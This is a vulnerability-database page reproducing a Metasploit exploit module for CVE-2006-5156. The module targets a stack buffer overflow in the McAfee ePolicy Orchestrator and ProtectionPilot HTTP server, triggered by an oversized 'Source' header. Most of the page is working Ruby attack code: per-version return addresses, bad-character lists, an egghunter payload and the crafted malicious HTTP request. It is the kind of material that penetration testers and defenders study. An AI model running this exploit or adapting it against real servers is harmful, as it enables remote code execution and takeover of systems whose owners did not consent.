Lucene search
Muts <[email protected]>, xbxice <[email protected]>, hdm <[email protected]>, aushack <[email protected]>MSF:EXPLOIT-WINDOWS-HTTP-MCAFEE_EPOLICY_SOURCE-HistoryOct 02, 2008 - 5:23 a.m.
McAfee ePolicy Orchestrator / ProtectionPilot Overflow
2008-10-0205:23:59
muts <[email protected]>, xbxice <[email protected]>, hdm <[email protected]>, aushack <[email protected]>
www.rapid7.com
5
This is an exploit for the McAfee HTTP Server (NAISERV.exe). McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are known to be vulnerable. By sending a large ‘Source’ header, the stack can be overwritten. This module is based on the exploit by xbxice and muts. Due to size constraints, this module uses the Egghunter technique.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'McAfee ePolicy Orchestrator / ProtectionPilot Overflow',
'Description' => %q{
This is an exploit for the McAfee HTTP Server (NAISERV.exe).
McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are
known to be vulnerable. By sending a large 'Source' header, the stack can
be overwritten. This module is based on the exploit by xbxice and muts.
Due to size constraints, this module uses the Egghunter technique.
},
'Author' =>
[
'muts <muts[at]remote-exploit.org>',
'xbxice[at]yahoo.com',
'hdm',
'aushack' # MSF3 rewrite, ePO v2.5.1 target
],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2006-5156' ],
[ 'OSVDB', '29421' ],
[ 'EDB', '2467' ],
[ 'BID', '20288' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'ePo 2.5.1 (Service Pack 1)', { 'Ret' => 0x600741b5 } ], # p/p/r nahttp32.dll 2.5.1.213
[ 'ePo 3.5.0/ProtectionPilot 1.1.0', { 'Ret' => 0x601EDBDA } ], # p/p/r xmlutil.dll
],
'Privileged' => true,
'DisclosureDate' => '2006-07-17'))
register_options(
[
Opt::RPORT(81),
])
end
def check
connect
req = "GET /SITEINFO.INI HTTP/1.0\r\n"
req << "User-Agent: Mozilla/5.0\r\n\r\n"
sock.put(req)
banner = sock.get_once
if banner.to_s =~ /Spipe\/1\.0/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
sploit = Rex::Text::rand_text_alphanumeric(92)
sploit << Rex::Arch::X86.jmp_short(6)
sploit << Rex::Text::rand_text_alphanumeric(2)
sploit << [target['Ret']].pack('V')
sploit << hunter[0]
content = egg
request = "GET /spipe/pkg HTTP/1.0\r\n"
request << "User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n"
request << "Content-Length: " + content.length.to_s + "\r\n"
request << "AgentGuid=" + Rex::Text::rand_text_alphanumeric(64) + "\r\n"
request << "Source=" + sploit + "\r\n"
request << "\r\n"
request << content
sock.put(request + "\r\n\r\n")
disconnect
handler
end
end